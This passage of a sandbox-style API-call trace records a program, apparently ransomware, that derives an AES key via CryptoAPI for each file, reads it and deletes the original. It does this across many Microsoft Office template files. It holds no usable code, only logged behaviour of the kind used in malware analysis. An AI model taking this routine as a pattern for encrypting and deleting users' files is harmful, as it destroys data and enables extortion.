CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BillingStatement.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\billingstatement.xltx")) returned 1 [0173.537] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.538] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.538] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.538] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.538] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5d23e5 [0173.538] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.962] CryptDestroyHash (hHash=0x284d668) returned 1 [0173.962] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.962] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.963] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktieletter.dotx")) returned 1 [0173.971] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.972] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.972] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.972] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.972] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5d2119 [0173.972] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0174.476] CryptDestroyHash (hHash=0x284d568) returned 1 [0174.476] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0174.476] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0174.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktiemergeletter.dotx")) returned 1 [0174.485] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0174.486] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0174.486] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.486] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0174.486] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x96f4b3 [0174.486] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0175.579] CryptDestroyHash (hHash=0x284d668) returned 1 [0175.580] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0175.580] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0175.581] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktienewsletter.dotx")) returned 1 [0175.585] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0175.586] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0175.586] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.586] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0175.586] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6724a3 [0175.586] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.067] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.067] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.067] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktieresume.dotx")) returned 1 [0176.132] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.133] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.133] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.133] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.133] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4352 [0176.133] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.147] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.147] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.147] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Blog.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blog.dotx")) returned 1 [0176.150] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.150] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.150] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.150] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.150] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x72a6 [0176.150] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.164] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.164] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.164] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.165] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BloodPressureTracker.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\bloodpressuretracker.xltx")) returned 1 [0176.167] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.168] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.168] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.168] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.168] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x125418 [0176.168] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.281] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.281] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.281] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ClassicPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\classicphotoalbum.potx")) returned 1 [0176.284] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.285] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.285] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.285] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.285] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x95482 [0176.285] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.333] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.333] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.333] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ContemporaryPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\contemporaryphotoalbum.potx")) returned 1 [0176.342] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.343] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.343] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.343] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.343] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1f0bf [0176.343] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.359] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.359] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.359] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.360] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialletter.dotx")) returned 1 [0176.362] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.363] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.363] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.363] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.363] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ea93 [0176.363] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.376] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.376] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.376] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialmergeletter.dotx")) returned 1 [0176.379] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.380] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.380] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.380] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.380] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc195 [0176.380] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.470] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.470] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.470] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialreport.dotx")) returned 1 [0176.480] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.481] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.481] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.481] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.481] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x47014 [0176.481] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.544] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.544] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.544] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialresume.dotx")) returned 1 [0176.550] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.550] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.550] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.550] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.550] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11d28 [0176.550] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.573] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.573] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.573] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.575] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executiveletter.dotx")) returned 1 [0176.577] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.578] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.578] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.578] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.578] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12042 [0176.578] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.584] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.584] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.584] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivemergeletter.dotx")) returned 1 [0176.588] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.589] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.589] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.589] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.589] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d49a [0176.589] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.633] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.633] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.633] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.635] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivenewsletter.dotx")) returned 1 [0176.638] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.639] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.639] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.639] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.639] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcb42a [0176.639] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.802] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.802] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.802] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.803] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivereport.dotx")) returned 1 [0176.813] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.813] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.813] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.813] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.813] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b00c [0176.813] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.834] CryptDestroyHash (hHash=0x284d668) returned 1 [0176.834] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.834] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.836] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executiveresume.dotx")) returned 1 [0176.838] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.838] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.838] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.838] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.838] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4a4d [0176.838] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0176.938] CryptDestroyHash (hHash=0x284d568) returned 1 [0176.938] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0176.938] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0176.940] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExpenseReport.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\expensereport.xltx")) returned 1 [0176.945] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0176.946] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0176.947] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0176.947] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.947] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0176.947] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1fa5cb9 [0176.947] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0181.917] CryptDestroyHash (hHash=0x284d668) returned 1 [0181.917] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0181.917] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0181.918] DeleteFileW (lpFileName="C:\\Program 